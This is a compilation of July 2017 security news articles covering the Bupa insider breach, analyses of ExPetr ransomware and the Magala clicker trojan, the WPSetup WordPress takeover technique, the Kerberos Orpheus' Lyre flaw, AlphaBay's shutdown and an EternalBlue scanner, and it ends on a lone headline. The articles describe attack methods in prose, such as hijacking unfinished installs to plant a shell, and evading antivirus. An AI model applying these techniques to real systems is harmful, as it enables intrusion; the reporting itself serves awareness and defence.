For now, Bupa is providing little more information. It is contacting those customers who are affected "to apologize and advise them as we believe the information has been made available to other parties." This implies that affected customers should be particularly wary about phishing attempts seeking additional information, either for complete identity theft or just to steal bank account details or card numbers.

Earlier this week, Kaspersky Lab published a study on "The Human Factor in IT Security", showing the extent to which employees are making businesses vulnerable from within. Kaspersky's principal security researcher David Emm believes employees rank at the very top of the list of threats to data and systems. "When insider-assisted attacks do occur," he told SecurityWeek, "the impact of such attacks can be devastating as they provide a direct route to the most valuable information -- in this case, customer data."

David Kennerley, director of threat research at Webroot, adds, "Because of the nature of the information that's been leaked, Bupa Global customers who have been affected need to be extra vigilant, without doubt they are now prime targets for phishing attacks and other targeted activities, as well as possible identify theft."

The potency of identity theft should not be underestimated. On Monday this week Alf Goransson -- the CEO of Securitas, Sweden's largest security firm -- was declared bankrupt by the Stockholm District Court (it is expected to be rescinded). A fraudulent loan had been taken out in his name in April after his identity was stolen at the end of March. The perpetrator also used his name to request bankruptcy. The bankruptcy led to Goransson's automatic deregistration by the Swedish Companies Registration Office as the Securitas CEO.

In the Bupa incident, the perpetrator is known and has been dismissed, and Bupa is taking 'appropriate legal action'. In response to SecurityWeek's request for clarity, Bupa said, "It was an existing employee." It was neither an ex-employee, nor a contractor. "Just to reiterate," continued Bupa, "the employee had access to this information as part of their job and chose to abuse their position. The employee responsible has been dismissed. Bupa has a zero-tolerance attitude towards data theft."

Bupa has not said how it discovered the breach, whether it was via its own internal controls or because a third-party (such as law enforcement) recognized it on the dark web. Nor has it said exactly when it discovered the breach, nor when it dismissed the employee.

The UK data protection regulator, the Information Commissioners Office (ICO), confirmed that it knows about the incident and told SecurityWeek, "Organizations have a duty to protect people's privacy and personal data. We have been made aware of an issue involving Bupa Global and are making enquiries." However, the ICO declined to tell SecurityWeek when it had been informed of the breach.

Since DataBreaches knew about the loss on 23 June, it is likely that Bupa knew about it around the same time. That implies that the AlphaBay takedown occurred after MoZeal's offer to sell Bupa data, and before Bupa disclosed the loss. The timing is most probably coincidental; but nevertheless, the only SecurityWeek question that Bupa completely ignored, was this: "Does the theft of your data and its subsequent offer for sale on AlphaBay have anything whatsoever to do with AlphaBay being taken down?" When companies limit the information they provide in their disclosures, there is a great temptation to fill in the gaps.


No Free Pass for ExPetr
14.7.2017 Kaspersky
Ransomware
Recently, there have been discussions around the topic that if our product is installed, ExPetr malware won’t write the special malicious code which encrypts the MFT to MBR. Some have even speculated that some kind of conspiracy might be ongoing. Others have pointed out it’s plain and simple nonsense. As usual, Vesselin Bontchev, a legend in IT security, who’s become famous for usually getting things right, said it best:

So, what is going on here? As a wise man once said, “the code doesn’t lie,” so let’s analyze the ExPetr MBR disk infection/wiping code in details.

In a nutshell, the malware does these actions:
Checks administrator privileges
Enumerates running processes
Depending on the processes found, initialize a special runtime config
Depending on this runtime config, malware execution branches are chosen


The malware’s main function

The “check privileges” function

An interesting fact is that malware tries to find several running processes (it calculates a hash from running process names and compares it with several hard-coded values).

Enumerating running processes

The most interesting part that happens here is:

After this condition two malicious functions could be executed:
InfectMbr This routine will write the malicious GoldenEye encryptor code to the MBR. After reboot, this code will encrypt MFT and 1024 bytes of each file.
WipePhysicalDrive This routine will overwrite the first 10 sectors of the disk with random trash.
Let’s describe this condition in detail:
The WipePhysicalDrive function will be initiated if:
the special bit in runtime config is not set (that happens when malware finds the avp.exe running process).
the InfectMbr function fails.
This is what happens after an initial infection:

Graphic illustration of condition

Very important additions:
WipePhysicalDrive could be initiated regardless of whether the avp.exe process is running or not. This function will be called when the malware could not write the malicious code to MBR. For example, it could be caused by the activity of other security solutions blocking this write.
Regardless of whether MBR was infected with malicious code or was overwritten with random trash, malware will still try to encrypt the victim’s files using the AES and RSA ciphers and the attacker’s public key.
Overall, it appears that the group behind ExPetr have built what is usually called a stone soup. This is a mix of old code, new code, dirty hacks, test checks and parts of unusual code. For instance, there is a special condition block in which the AES file encryption doesn’t run at all, however, this condition is always false. It very much looks like something that was rushed out the door before it was polished and ready, from many points of view.

Why the rush, you may wonder? We do not know, but there could be several explanations. One of them could be they tried really hard to catch the EternalBlue/EternalRomance “train”. After WannaCry, a lot of organizations started patching their Windows installations to close these vulnerabilities, effectively shrinking the window of opportunity. It’s possible the authors of ExPetr wanted to infect as many targets as possible before these exploits were widely patched.

Despite the rush, the attackers were obviously aware of our technologies (and other companies’ technologies, obviously), notably System Watcher, which is extremely effective at fighting ransomware. System Watcher works by collecting information about the suspicious actions of running programs and builds a score. For instance, when a program reads a full file in memory, it then writes another file of similar size yet different format, then deletes the original, and the score increases. Other similar known bad behavior is used to increase the score and good behavior to decrease it. If multiple malicious actions happen several times, over and over, the score can reach a threshold where it’s pretty obvious that something is wrong. In that case, System Watcher warns the user and offers to terminate the offending process and restore the data.

To fight against this technology, the ExPetr authors have included multiple “counter measures.” One of them is to avoid writing the GoldenEye encryptor code to the MBR if our product is running. This is done in order to prevent raising the suspicion score and getting terminated too early. It actually seems that they put significant energy into trying to bypass our products and target our users, meaning they were pretty worried about being stopped. Nevertheless, these didn’t work too well, reinforcing the theory of a big pile of hacks, put together in a rush. The System Watcher component fires anyway and stops the file encryption, terminating the process and undoing the changes.

To conclude, our users have been protected despite the measures built into ExPetr to target them.

So why we are writing this longer explanation? With complex malware code and retro measures built to bypass antivirus products, it is complicated to understand all the functionality of today’s malware. It is easy to get tricked and believe certain code checks give a free pass to Kaspersky users. In reality, they were intended as a means of trying to pass under the System Watcher’s radar. In the end, it didn’t work. Our users do not need a free pass from ExPetr, since they have an universal “free pass” from our products and System Watcher.


The Magala Trojan Clicker: A Hidden Advertising Threat
14.7.2017 Kaspersky
Virus
One large group will slowly conquer another large group, reduce its numbers, and thus lessen its chance of further variation and improvement. <…> Small and broken groups and sub-groups will finally tend to disappear.
Charles Darwin. ‘On the Origin of Species’
The golden age of Trojans and viruses has long gone. Malicious programs created by enthusiasts for research purposes and for fun are now largely confined to history books and dusty computer incident reports. They have been replaced by programs that put a heavy emphasis on making money.

If we ignore targeted attacks prepared by professionals for very specific purposes, what sort of malware do we most often hear about today? Encryption malware and DDoS botnets made up of IoT devices. Both types are profitable for cybercriminals and relatively easy to implement. However, they are not the only types of malware capable of generating cash; we mustn’t overlook a third particularly numerous borderline malware family that includes advertising bots and modules, and partnership programs – all of which is typically referred to as potentially unwanted adware/potentially unwanted programs (PUA/PUP). They are borderline because there is a fine line between classifying a program as adware and defining the same program as an outright Trojan. In this paper, we will deal with one such renegade that has gone well beyond the limits of ‘fair play’ when it comes to advertising.

The malware in question is detected by Kaspersky Lab products as Trojan-Clicker.Win32.Magala.

Operating algorithm
Magala falls into the category of Trojan Clickers that imitate a user click on a particular webpage, thus boosting advertisement click counts. It’s worth pointing out that Magala doesn’t actually affect the user, other than consuming some of the infected computer’s resources. The main victims are those paying for the advertising; typically they are small business owners doing business with unscrupulous advertisers.

The first stage of infection involves the Trojan checking which version of Internet Explorer is installed and locating it in the system. If it’s version 8 or earlier, the Trojan won’t run. So, if you still have this version on your computer, there’s nothing to worry about.

Checking the version of Internet Explorer, virtual desktop initialization.
Checking the version of Internet Explorer, virtual desktop initialization.
If the desired version of Internet Explorer is found, then, unbeknown to the user, a virtual desktop is initialized. All further activities are performed here. After that a sequence of utility operations is run (something that is typical for this malware family): autorun is set up, a report is sent to a hardcoded URL, and the required adware is installed. To interact with the content of an open page, Magala uses IHTMLDocument2, the standard Window interface that makes it easy to use DOM tree. The Trojan uses it to load MapsGalaxy Toolbar, installs it on the system and adds the site hxxp://hp.myway.com to the system registry, also associated with MapsGalaxy, so that it becomes the browser’s home page.

A simple check is incorporated into the Trojan to find out if the search bar has already been installed – this is done with the help of the appropriate registry branch.

Magala then contacts the remote server and requests a list of search queries for the click counts that need to be boosted.

Receiving the list of search queries
This list is sent ‘as is’, in a plain text file with lots of strings.

List of search queries
Using this list, the program begins to send the requested search queries and click on each of the first 10 links in the search results, with an interval of 10 seconds between each click.

Программа начинает последовательно вводить указанные запросы и кликать по десяти первым ссылкам

Программа начинает последовательно вводить указанные запросы и кликать по десяти первым ссылкам

Profit margin
As far as we know, an average cost per click (CPC) in a campaign like this is 0.07 USD. The cost per thousand (CPM) comes to 2.2 USD. It should be noted that Trojan Clickers are certainly not the most popular way of selling advertising: the method most in demand is the displaying of a set homepage, where each installation also costs 0.07 USD.

A botnet consisting of 1000 infected computers clicking 10 website addresses from each search result and performing some 500 search requests with no overlaps in the search results could ideally mean the virus writer earns up to 350 USD from each infected computer. However, these cost estimates are only approximations, and don’t typically occur in the real world. The costs of different requests may vary greatly, and the price of 0.07 USD per click is also an average value.

Propagation statistics
As can be seen in the diagram below, Trojan-Clicker.Win32.Magala infections occur most often in Germany and the US. This finding is corroborated by an analysis of the search requests for which the click numbers need to be boosted. These statistics were collected from March to early June 2017.

Conclusion
Programs belonging to the potentially unwanted adware class do not typically pose as much of a threat to the end user as, say, encryption or banking malware does. However, there are two characteristic features to this malware class which make it difficult to deal with. Firstly, there is the borderline functionality that blurs the lines between legitimate and malicious software. It has to be clarified whether a specific program is part of a secure and legal advertising campaign or if it is illegitimate software performing similar functions. A second important aspect of this class – its sheer quantity – also means a fundamentally different approach to any analysis is required.

MD5
1EB2D932BB916D4DB7F483859EEBABF8
206DD0B0E8FAA2D81AB617491F80AD0B
25BC675D23C2ACD5F288856F6B91818D
44A408386B983583CAEB0590433BE07B
4E4FA0B8C73889E9AA028C8FD7D7B3A5
6D3D80E89ABDED981AE329203F1779EB
6FA035264744E9C9A30409012BAB18DE
732B82A7424B60FEBB1E874B205E2D76
771E742D6C110F8BD68A7304EF93B131
A6B288A3B8C48A23092246FBBF6DB7C2
CF5A5C45778C793477ECAB02F1B3B2C3
DC16BA21BFE4838FD2A897FF13050FF4
F364B043BD6E2CC9C43F86E2004D71D3
F36672933F3CBACF8D8B396DFE259526


New "WPSetup" Attack Targets Fresh WordPress Installs

14.7.2017 securityweek Attack

A new type of attack against WordPress is targeting fresh installations to get admin access and execute PHP code in the victim’s web hosting account, Wordfence reveals.

Dubbed WPSetup, the campaign was observed in May and June, and starts with the attackers scanning for a specific URL used by new installations of WordPress: /wp-admin/setup-config.php. If the URL contains a setup page, it means the victim has recently installed WordPress on their server but has yet to configure it.

Basically, it means that those who install WordPress either by unzipping the ZIP archive or through a one-click installer but don’t immediately complete the installation steps provide attackers with the necessary means to take control of the website.

“It is very easy for an attacker to take over not just the new WordPress website, but the entire hosting account and all other websites on that hosting account,” Mark Maunder, Wordfence founder and CEO, claims.

Any WordPress installation starts with selecting the language, followed by an introductory message, after which the user selects a database name, username, password and server for the new WordPress installation. At this point, an attacker who finds the fresh install can “click through the first two steps and then enter their own database server information,” Maunder argues.

The attack is successful even if the database is on their own server or contains no data, Wordfence says. A working WordPress installation on the victim’s site and admin access to it is all the attackers need. Once the final installation step is completed, WordPress confirms that it can communicate with the database, and presents the attacker with a dialogue to run the install.

At this point, the attacker can create the first admin-level account with their own information, hit install, and then sign into a fresh WordPress on the victim’s server, using their own database.

“Once an attacker has admin access to a WordPress website running on your hosting account, they can execute any PHP code they want in your hosting account,” Maunder notes.

Because WordPress allows admins to edit the code of themes and plugins, an attacker can simply launch the theme or plugin editor and insert PHP code, thus having the code executed the next time the page is refreshed.

“Once an attacker has admin access to a WordPress site, they can upload any plugin with any PHP code, including their own custom plugin. To execute their code, they spend a few minutes creating a basic WordPress plugin and then upload it to the site and activate it,” Maunder continues.

An attacker could execute code on the victim’s site and also install a malicious shell in a directory in the victim’s hosting account, thus gaining access to all files and websites on that account. This would also provide the attacker with access to any databases the WordPress installation has access to, and maybe also with access to other application data.

Logan Kipp, Product Evangelist at SiteLock, told SecurityWeek in an emailed comment that incomplete WordPress setups left online and publicly-accessible are more common than one might think. According to Kipp, even when warned of the risks involved, many customers wouldn’t understand that “reinstalling WordPress would not inhibit a persistent infection, especially if it spread outside of the WordPress file structure.”

“Cybercriminals aren't always after just sensitive information like passwords and credit cards, a server's resources are one of the many currencies of the cybercriminal underworld. Your server may be used to leverage attacks on other servers or website visitors. One of the questions I am frequently asked is "who host a cybercriminal?" In most cases, the answer is regular people who aren't well-informed that have become unwilling cohabitants to a cybercriminal,” he continues.

Weston Henry, Lead Security Analyst at SiteLock, tells SecurityWeek that attack itself is a well-known tactic and that long have web scanners been configured to find default install files and directories.

“The WordPress attackers capitalized on the sheer number of WordPress installs on the net, and took advantage of forgotten and unfinished installs. Site owners can protect themselves by preparing for and completing new WordPress installs as soon as they're begun. Next, site owners can use a web application firewall to whitelist owner or developer IP addresses. An .htaccess file can also be used to limit access by IP address,” Henry said.

In a separate report, Wordfence revealed that the number of daily complex attacks against WordPress has increased to 7.2 million in June, up 32% from May. The average number of daily brute force attacks went up 36% compared to May, with a peak at over 41 million.

The report also reveals that the top 25 attacking IPs launched a total of 133 million attacks in June, a slight decrease from the 144 million attacks registered in May. The most attacked WordPress theme was mTheme-Unus, while the most targeted plugin was WP Mobile Detector. The top three attacking countries are Russia, U.S. and Ukraine, the report also reveals.


Old Kerberos Bypass Flaw Patched in Windows, Linux

14.7.2017 securityweek Vulnerebility

A 20-year-old authentication bypass vulnerability affecting some implementations of the Kerberos protocol has been patched in Windows, Linux and BSD operating systems.

Kerberos, whose name stems from the mythological three-headed hound Cerberus, is an authentication protocol that uses “tickets” to allow nodes to communicate securely over a non-secure network.

The flaw has been dubbed Orpheus' Lyre because similar to how the bard Orpheus managed to get past Cerberus by putting it to sleep with his lyre, the vulnerability can be used to bypass Kerberos.

Researchers Jeffrey Altman, Viktor Duchovni and Nico Williams first discovered the security hole in the Heimdal implementation of Kerberos, which had been vulnerable since late 1996. Microsoft’s implementation also turned out to be affected, but the MIT Kerberos was never impacted. Orpheus' Lyre vulnerability

The experts have not provided too many technical details in order to give users time to apply the patches. However, they did reveal that the flaw affects the Kerberos v5 specification and it’s related to the use of unauthenticated plaintext.

A man-in-the-middle (MitM) attacker can exploit the vulnerability to steal credentials, escalate privileges, and bypass authentication.

“In _krb5_extract_ticket() the KDC-REP service name must be obtained from encrypted version stored in 'enc_part' instead of the unencrypted version stored in 'ticket'. Use of the unecrypted version provides an opportunity for successful server impersonation and other attacks,” said the developers of Heimdal, who track the flaw as CVE-2017-11103.

Heimdal is used by several Linux distributions, which have already started releasing patches. Red Hat is not affected as it uses the MIT implementation of Kerberos.

The vulnerability has also been addressed in Samba, which includes the Heimdal Kerberos since version 4.0.0. FreeBSD has also published an advisory.

Microsoft, which tracks the flaw as CVE-2017-8495, addressed it in Windows with its latest Patch Tuesday updates.

“A security feature bypass vulnerability exists in Microsoft Windows when Kerberos fails to prevent tampering with the SNAME field during ticket exchange. An attacker who successfully exploited this vulnerability could use it to bypass Extended Protection for Authentication.

To exploit this vulnerability, an attacker would have to be able to launch a man-in-the-middle attack against the traffic passing between a client and the server,” Microsoft said in its advisory.

The experts who discovered Orpheus' Lyre pointed out that this is a client-side bug that cannot be mitigated on the server side.

While the researchers, Samba and Heimdal have classified this as a critical vulnerability, Microsoft and some of the affected Linux distributions assigned it an “important” or “medium” severity rating, likely due to the fact that the attacker requires network access for exploitation.


Australia to Compel Chat Apps to Hand Over Encrypted Messages

14.7.2017 securityweek Social

Social media giants like Facebook and WhatsApp will be compelled to share encrypted messages of suspected terrorists and other criminals with Australian police under new laws unveiled Friday.

It comes after Prime Minister Malcolm Turnbull warned encrypted messages were increasingly being used by terrorists, drug traffickers and paedophile rings, calling for legislation to be modernised to allow police to do their jobs.

"We need to ensure that the internet is not used as a dark place for bad people to hide their criminal activities from the law," he said, adding that the tech giants must "face up to their responsibility".

"They can't just wash their hands of it and say it's got nothing to do with them."

Australian authorities can currently obtain information from telecommunications companies, but not internet firms that use data encryption to guarantee user confidentiality.

Encryption essentially involves complex algorithms scrambling data to make it indecipherable until unlocked by its owner or when it reaches its destination.

"Because of this end-to-end encryption, all of that information, all of that data, that communication is effectively dark to the reach of the law," said Turnbull.

"And that's not acceptable. We are a society, a democracy, under the rule of law, and the law must prevail online as well as offline."

The laws will be introduced into parliament by the end of the year.

Attorney-General George Brandis said the legislation would be similar to Britain's Investigatory Powers Act, which imposes an obligation on companies to cooperate with investigations.

They would provide Australian intelligence and law enforcement authorities with coercive powers as a "last resort" if tech companies did not voluntarily help, said Brandis.

"It is vitally important that the development of technology does not leave the law behind," he said.

However, Silicon Valley tech companies have so far refused to bend to similar legal requests.

Facebook said it already had a system in place to help police and intelligence officials in Australia.

"We appreciate the important work law enforcement does, and we understand their need to carry out investigations. That's why we already have a protocol in place to respond to requests where we can," a spokesperson said.

"At the same time, weakening encrypted systems for them would mean weakening it for everyone."

Apple told AFP it had no comment on the new legislation.

British Home Secretary Amber Rudd will travel to the United States shortly to discuss the issue further with her American counterpart and tech companies, said Turnbull.

The US government last year locked horns in a legal battle with Apple, seeking to compel the iPhone maker to help decrypt a device used by one of the attackers in the San Bernardino shooting rampage.

Authorities eventually dropped the case after finding a way to break into the iPhone without Apple's help.

Turnbull admitted it may be difficult to enforce the laws if firms do not comply, but said it was important to "recognise the challenge and call on those companies to provide the assistance".


Inadequate Boundary Protections Common in Critical Infrastructure: ICS-CERT

14.7.2017 securityweek ICS

The assessments conducted by the U.S. Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) in 2016 showed that inadequate boundary protection has remained the most prevalent weakness in critical infrastructure organizations.

ICS-CERT conducted 130 assessments in the fiscal year 2016, which is more than in any previous year. Monitor newsletters published by ICS-CERT this year show that it has already conducted 74 assessments in the first half of 2017.

Assessments are offered to both government organizations and private sector companies whose owners and operators request them. Last year, the CERT conducted assessments in 12 of the 16 critical infrastructure sectors, including chemical, commercial facilities, communications, critical manufacturing, emergency services, dams, energy, food and agriculture, IT, government facilities, transportation, and water and wastewater systems.

Similar to the previous two years, inadequate boundary protection remained the most common flaw – 94 discoveries representing more than 13 percent of all weaknesses identified during assessments. Boundary protection issues can result in failure to detect unauthorized activity in critical systems, and an increased risk to control systems due to the lack of proper separation from the enterprise network.

The second most prevalent type of vulnerability, with 42 discoveries, is “least functionality.” This refers to organizations failing to implement controls to ensure that unnecessary services, ports, protocols or applications that can be exploited to gain access to ICS are disabled.

ICS-CERT also discovered 36 instances of identification and authentication flaws. Many organizations fail to implement proper identification and authentication mechanisms for their users – this leads to accountability problems and makes it more difficult to secure the accounts of individuals who have left the company.

The fourth most prevalent issue discovered during assessments is related to physical access controls – which can make it easier for malicious actors to gain an initial foothold into the targeted organization’s ICS network.

Another common problem identified by investigators was related to mechanisms for auditing and accountability. According to ICS-CERT, 26 organizations did not have a formal process in place for reviewing and validating logs, which makes it more difficult to detect an intrusion in the ICS network and respond to an incident.

ICS-CERT’s FY 2016 Annual Assessment Report also includes recommendations on how to address these issues.


20 years-old Orpheus’ Lyre vulnerability in Kerberos fixed this week
14.7.2017 securityaffairs
Vulnerebility

A 20 years-old vulnerability in Kerberos, dubbed Orpheus’ Lyre, was parched this week for both Microsoft and Linux distros.
A 20 years-old vulnerability in Kerberos was parched this week for both Microsoft and Linux distros.

The vulnerability dubbed Orpheus’ Lyre has been found three months ago by Jeffrey Altman, founder of AuriStor, and Viktor Dukhovni and Nicolas Williams from Two Sigma Investments. The issue

The flaw, tracked as CVE-2017-11103, was found in Heimdal, an open-source implementation of Kerberos, like the mythological character Orpheus played his lyre with such grace that it lulled Cerberus to sleep, this issue can bypass Kerberos.

The issue could result in remote privilege escalation and credential theft, an attacker can trigger it to access the target network.

“The original cryptographic sin of Kerberos is an abundance of unauthenticated plaintext in the protocol. That is, portions of Kerberos messages are neither encrypted nor integrity-protected in some direct cryptographic manner. In some cases that sin is likely born of premature optimization — the mother of many bugs. Kerberos can be secure despite this surfeit of unauthenticated plaintext, but it requires extreme care by implementors to get every detail right so as to authenticate said plaintext.” reads the description for the Orpheus’ Lyre .”Orpheus’ Lyre happened because of one instance of unauthenticated plaintext, and the ease with which the specific plaintext could accidentally be used instead of an authenticated copy of the same text. The unauthenticated plaintext issue at hand is this: the Ticket issued in KDC responses. “

The flaw is related the way Kerberos handles authentication messages, the expert discovered that flawed implementations of Kerberos fetched metadata from unprotected key distribution center (KDC) tickets rather than encrypted KDC responses.

“The attacker needs to be on the network and to have control over a service principle that the client could communicate with,” Altman told The Register. “As far as we know there are no exploits in the wild. But it certainly is exploitable and we consider it to be very serious.”

“Given how broadly Kerberos has been deployed over the last almost 30 years, it clearly is in a wide ecosystem with a lot of different vendors,”

The Orpheus’ Lyre bug affects multiple different Kerberos 5 implementations, including one by Microsoft and by the KTH Royal Institute of Technology in Sweden (Heimdal).

kerberos

Altman recommends to review every Kerberos implementation, not every vendor can be expected to have fixed the vulnerability and in some cases, the vendors went out of the market.

Altman explained that the flaw could have been prevented by removing the unencrypted fields in order to force the use of the encrypted ones when the authentication request is composed.

“In _krb5_extract_ticket() the KDC-REP service name must be obtained from encrypted version stored in ‘enc_part’ instead of the unencrypted version stored in ‘ticket’. Use of the unecrypted version provides an opportunity for successful server impersonation and other attacks.” wrote Altman.

“The fact that this has been around for as long as it has been in open source, I think, is just one more case that should debunk the theory that open source programming is in some way more secure than closed source programming.”

The expert pointed out that if IT giants like Microsoft failed in identifying the problem other companies missed it, the same story for the entire open source community.

Altman has no doubt, this kind of issues will continue to plague the open-source community because developers are often not compensated for their contributions.

“We will never be reimbursed for the cost to our lives and the lost time to our companies for having done this favor to the world,” Altman concluded. “As a society, we need to understand what the costs of this work are.”


Ubuntu Linux for Windows 10 Released — Yes, You Read it Right

14.7.2017 thehackernews  IT

Windows and Linux in the same line? Yes, you heard that right... and that too, on the same computer and within the same operating system.
Two months ago, Microsoft announced its plans to let its users install three different flavours of the Linux operating system – Ubuntu, Fedora, and SUSE – directly through their Windows Store, allowing them to run Windows and Linux apps side-by-side.
Now, downloading an entire operating system has just become as easy as downloading an application with the availability of popular Linux distro 'Ubuntu' in the Windows App Store.
However, unlike a conventional Ubuntu installation, this Ubuntu version runs in a sandboxed alongside Windows 10 with limited interaction with the operating system and is focused on running regular command-line utilities like bash or SSH as a standalone installation through an Ubuntu Terminal.
For now, Ubuntu is currently only available to Windows 10 Insiders users and would be made available to the public with the upcoming Windows 10 Fall Creator Update, which is expected to release in September/October 2017.
Here's How to Install and Run Ubuntu on Windows 10
Users registered in Windows 10 Insiders Program with at least "Build 16215" installed can directly install Ubuntu from the Windows Store, which will allow them to "use Ubuntu Terminal and run Ubuntu command line utilities including bash, ssh, git, apt and many more."
After installing Ubuntu, Windows 10 users will require enabling "Windows Subsystem for Linux" that was previously added to Windows 10.
To enable it, follow these simple steps:
Navigate to Control Panel and go to "Apps and features" settings.
Select "Programs and Features" from the right panel.
Open the "Turn Windows features on or off" from the left menu.
Select the "Windows Subsystem for Linux" and save it.
Reboot Your system.
While the company has not revealed exactly when its users can expect to see the other two Linux distro, Fedora and SUSE Linux, to the Windows Store, this step by Microsoft follows its commitment to the open source community.

In 2013, the Microsoft launched Visual Studio, and a year later, the company open-sourced .NET. In 2015, the tech giant open sourced the Visual Studio Code Editor, as well.
Last year, Microsoft took many steps to show its love for Linux, which includes bringing of Ubuntu on Windows 10, working with FreeBSD to develop a Virtual Machine image for its Azure cloud, choosing Ubuntu as the OS for its Cloud-based Big Data services, and even joining the Linux Foundation as a Platinum member – the highest level of membership.
Have you tried out Ubuntu on Windows 10? If yes, let us know your experience in the comments below.


AlphaBay Shut Down After Police Raid; Alleged Founder Commits Suicide in Jail
14.7.2017 thehackernews  BigBrothers

AlphaBay Market — one of the largest Dark Web marketplaces for drugs, guns, and other illegal goods — that mysteriously went dark earlier this month without any explanation from its admins has reportedly been shut down by the international authorities.
On July 4th, the dark web marketplace suddenly went down without any explanation from its admins, which left its customers who have paid large sums in panic.
Some customers even suspected that the site's admins had pulled an exit scam to steal user funds.
However, according to the Wall Street Journal, the disappearance of the AlphaBay came after authorities in the United States, Canada, and Thailand collaborated to conduct a series of raids and arrest Alexandre Cazes, who allegedly was one of the AlphaBay's operators.
Citing "people familiar with the matter," the publication claims that Cazes, a resident of Canada, was arrested in Thailand and taken into custody in Bangkok on July 5th, the same day the police executed two raids on residences in Quebec, Canada.
The 26-year-old Canadian citizen was awaiting extradition to the United States when a guard found him hanged in his jail cell on Wednesday, the Chiang Rai Times confirms. Cazes is believed to have hanged himself using a towel.

Cazes had been living in Thailand for nearly 8 years. During his arrest, authorities also seized "four Lamborghini cars and three houses worth about 400 million baht ($11.7 million) in total."
AlphaBay, also known as "the new Silk Road," also came in the news at the beginning of this year when a hacker successfully hacked the AlphaBay site and stole over 200,000 private unencrypted messages from several users.
After the disappearance of Silk Road, AlphaBay emerged in 2014 and became a leader among dark web marketplaces for selling illicit goods from drugs to stolen credit card numbers, exploits, and malware.
Unlike dark web market 'Evolution' that suddenly disappeared overnight from the Internet, stealing millions of dollars worth of Bitcoins from its customers, AlphaBay Market was shut down by the law enforcement, suffering the same fate as Silk Road.
Silk Road was shut down after the law enforcement raided its servers in 2013 and arrested its founder Ross William Ulbricht, who has been sentenced to life in prison.
The FBI also seized Bitcoins (worth about $33.6 million, at the time) from the site. Those Bitcoins were later sold in a series of auctions by the United States Marshals Service (USMS).


WPSetup attack, hackers targets uncompleted WordPress installs
1.7.2017 securityaffairs
Attack

Attackers are using automated scans to target freshly installed WordPress websites, WordFence experts dubbed the technique WPSetup attack.
According to experts at the WordPress security plugin WordFence, attackers are using automated scans to target freshly installed WordPress websites, taking advantage of administrators who fail to properly configure their server’s settings. The experts dubbed the attack WPSetup attack.

Hackers launched thousands of scans each day, searching for the URL /wp-admin/setup-config.php, that new WordPress installs use to setup new sites.

The attackers aim to find new WordPress installs that are not yet configured by the administrators.

In the period between the end of May and mid-June, WordFence researchers observed a spike in the number of attacks targeting WordPress accounts from the end of May to mid-June.

“In May and June, we saw our worst-of-the-worst IPs start using a new kind of attack targeting fresh WordPress installations.” states WordFence.

“We also had our first site cleaning customer that was hit by this attack.

Attackers scan for the following URL:

/wp-admin/setup-config.php

This is the setup URL that new installations of WordPress use. If the attacker finds that URL and it contains a setup page, it indicates that someone has recently installed WordPress on their server but has not yet configured it. At this point, it is very easy for an attacker to take over not just the new WordPress website, but the entire hosting account and all other websites on that hosting account.”

In just one day, on May 30, the experts observed roughly 7,500 scans a day, a peak in the malicious activity.

WordPress WPSetup attack

The WPSetup attack leverages on the fact that a user hasn’t finished setting up its WordPress installation, the attacker can exploit this condition to complete the user’s installation.

The attackers operate with admin access, this means that they can enter their own database name, username, password, and database server. The attackers can take over the website running their own installation or creating a supplementary account.

How the WPSetup Attack Gets Full Control of Your Hosting Account?

Once the attacker gains admin access to a WordPress website running on your hosting account, they can execute PHP code via a theme or plugin editor.

The attackers can install a shell in a victim’s directory to access any files or websites on the account or access any databases or application data.

“Once an attacker can execute code on your site, they can perform a variety of malicious actions. One of the most common actions they will take is to install a malicious shell in a directory in your hosting account. At that point they can access all files and websites on that account. They can also access any databases that any WordPress installation has access to, and may be able to access other application data.” continues the analysis.

WordFence explained that the WPSetup attack is not new, but this is the first time for such kind of attack on a large-scale.

WordFence recommends users to create a specially coded .htaccess file in the base of their web directory to avoid attackers access it before the installation is completed.

“Before you install a fresh WordPress installation, create a .htaccess file in the base of your web directory containing the following:

order deny,allow
deny from all
allow from <your ip>"
Replace the ‘<your ip>’ with your own IP address. You can find this out by visiting a site like whatsmyip.org.

This rule ensures that only you can access your website while you are installing WordPress. This will prevent anyone else from racing in, completing your installation and taking control of your hosting account by uploading malicious code.

Once complete, you can remove the .htaccess rule and allow the rest of the world to access your website.”


Eternal Blues scanner allowed to find 50,000 EternalBlue-vulnerable host
1.7.2017 securityaffairs Safety

The Eternal Blues scanner allowed administrators worldwide to discover more than 50,000 computers vulnerable to the NSA-linked EternalBlue exploit.
Recently the security researcher Elad Erez developed Eternal Blues, a free EternalBlue vulnerability scanner that could be used by administrators to assess networks.

Eternal Blues

Now Elad Erez published data collected by the Eternal Blues over the two weeks, the results are disconcerting, more than 50,000 scanned hosts are still vulnerable to the exploit. The data is even more worrisome if you consider that a single vulnerable machine could expose the entire network to the attackers.

The administrator of a network composed of 10,000 hosts discovered the only two machines were still vulnerable, in information that was crucial to protect the entire network.

As of July 12, the Eternal Blues tool was used to scan more than 8 million IPs, 1.5 million are located in France.

Eternal Blues scan Vulnerability_map

Erez revealed that vulnerable machines were found in around 130 countries, top 3 countries had more than 30,000 vulnerable machines.

53.82% of the vulnerable hosts still have SMBv1 enabled, 1 out of 9 hosts in a network is vulnerable to EternalBlue.

Although Eternal Blues found only around 50,000 vulnerable systems,

Erez explained that the number of vulnerable machines is much higher than 50,000, he explained that issues with the tool prevented it from correctly counting the number of vulnerable hosts.

Erez issued a new release of the tool on July 2 that fixes the above problems.

Below the results of the scan:

More than 8 million IPs were scanned. France taking the lead with 1.5 million
The top 3 vulnerable countries (out of ~130), had more than 30,000 vulnerable hosts altogether
The majority (53.82%) of hosts nowadays still have SMBv1 enabled
1 out of 9 hosts in a network is vulnerable to EternalBlue
One network, with almost 10,000 hosts (not IPs), had 2 vulnerable hosts. How could anyone find that without Eternal Blues?
Erez is satisfied by the scanner that has increased in a significant way the level of awareness on EternalBlue exploit allowing administrators to secure their networks.

“Unfortunately, exploitation of EternalBlue is still a very good method of invoking remote code execution. It is available in more than 50,000 hosts scanned by Eternal Blues (as for July 12, 2017). Yes, even after all the latest attacks by WannaCry and NotPetya. I’m here to remind you, sometimes it takes just 1 vulnerable machine to take you down.” concluded the expert.

“Although numbers are quite high (remember, these are IPs scanned with my tool only), I feel like awareness did increase somewhat. Running Eternal Blues is, by definition, being aware of the problem. So good for you for taking responsibility and checking your network status. Now it’s patching time!”

Administrators are recommended to periodically scan their networks for Eternal Blue flaw, to apply the latest patches and disable the SMBv1 protocol.


How CIA Agents Covertly Steal Data From Hacked Smartphones (Without Internet)
